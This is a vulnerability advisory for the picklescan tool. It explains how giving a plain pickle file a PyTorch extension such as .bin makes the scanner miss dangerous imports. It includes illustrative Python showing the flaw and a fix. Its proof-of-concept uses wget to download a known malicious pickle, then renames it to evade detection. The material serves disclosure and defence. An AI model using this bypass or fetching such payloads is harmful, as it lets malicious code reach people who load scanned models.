An Improper Input Validation vulnerability in the scanning logic of mmaitre314 picklescan versions up to and including 0.0.30 allows a remote attacker to bypass the pickle file security checks by supplying a standard pickle file with a PyTorch-related file extension. When a pickle file that was incorrectly considered safe is loaded, it can lead to the execution of malicious code.
( , 0.0.31)
The vulnerability exists in the scan_bytes function, which prioritizes file extension checks. If a file has a PyTorch-related extension (e.g., .bin), the scanner attempts to parse it using the scan_pytorch function. When a standard pickle file is given such an extension, this PyTorch-specific parsing fails. Crucially, the scanner then returns an error without falling back to a standard pickle analysis (scan_pickle_bytes). This logic gap allows a malicious standard pickle file, disguised with a mismatched extension, to evade detection.
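As an added illustration (example code, not picklescan's own), a reduced model of the dispatch described above: a denylist opcode scanner, a zip-only PyTorch parser, and a scan_bytes that either stops on a PyTorch parse error (the behaviour up to 0.0.30) or falls back to plain pickle analysis. The extension set, the denylist, the _Suspicious sample and the function bodies are assumptions made for this example.

```python
import io
import pickle
import pickletools
import zipfile

# Simplified stand-in for picklescan's extension-based dispatch (example code,
# not the project's own); the extension set and denylist are assumptions.
PYTORCH_EXTENSIONS = {".bin", ".pt", ".pth"}
UNSAFE_GLOBALS = {("builtins", "exec"), ("builtins", "eval"), ("os", "system")}

def scan_pickle_bytes(data):
    """Walk the opcode stream (nothing is executed); return denylisted globals."""
    found, strings = [], []  # strings: text pushes that feed STACK_GLOBAL
    for op, arg, _ in pickletools.genops(data):
        ref = None
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "UNICODE"):
            strings.append(arg)
        elif op.name == "GLOBAL":  # protocols 0-3: arg is "module name"
            ref = tuple(arg.split(" ", 1))
        elif op.name == "STACK_GLOBAL" and len(strings) >= 2:  # protocol 4+
            ref = (strings[-2], strings[-1])
        if ref in UNSAFE_GLOBALS:
            found.append(ref)
    return found

def scan_pytorch(data):
    """Zip-based checkpoint: scan each embedded .pkl; raise on non-zip input."""
    buf = io.BytesIO(data)
    if not zipfile.is_zipfile(buf):
        raise ValueError("not a zip-based PyTorch checkpoint")
    with zipfile.ZipFile(buf) as zf:
        return [r for m in zf.namelist() if m.endswith(".pkl")
                for r in scan_pickle_bytes(zf.read(m))]

def scan_bytes(data, filename, fallback):
    """fallback=False mirrors <=0.0.30: a failed PyTorch parse ends the scan
    with nothing flagged. fallback=True re-scans the bytes as a plain pickle."""
    if filename.lower().endswith(tuple(PYTORCH_EXTENSIONS)):
        try:
            return scan_pytorch(data)
        except ValueError:
            if not fallback:
                return []  # error reported, no findings: the bypass
    return scan_pickle_bytes(data)

class _Suspicious:
    """Constructed sample: pickles to a call of builtins.exec("pass"); never loaded."""
    def __reduce__(self):
        return (exec, ("pass",))
SAMPLE_PICKLE = pickle.dumps(_Suspicious(), protocol=4)
```

The same bytes are flagged as model.pkl, silently pass as model.bin without the fallback, and are flagged again as model.bin once the fallback is in place; sniffing the content (zip magic vs. PROTO opcode) instead of trusting the extension removes the dependency on the file name altogether.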
The following steps demonstrate how to bypass the scanner.
# 1. Download a known malicious pickle file.
wget https://huggingface.co/kzanki/regular_model/resolve/main/model.pkl?download=true -O model.pkl
# 2. Scan the original file. PickleScan correctly detects the threat.
# Output will contain: dangerous import 'builtins exec' FOUND
picklescan -p model.pkl
# 3. Rename the file with a PyTorch-related extension.
cp model.pkl model.bin
# 4. Scan the renamed file.
# The scan will fail with a PyTorch parsing error and NOT detect the malicious payload.
picklescan -p model.bin
No mitigations are supplied for this issue.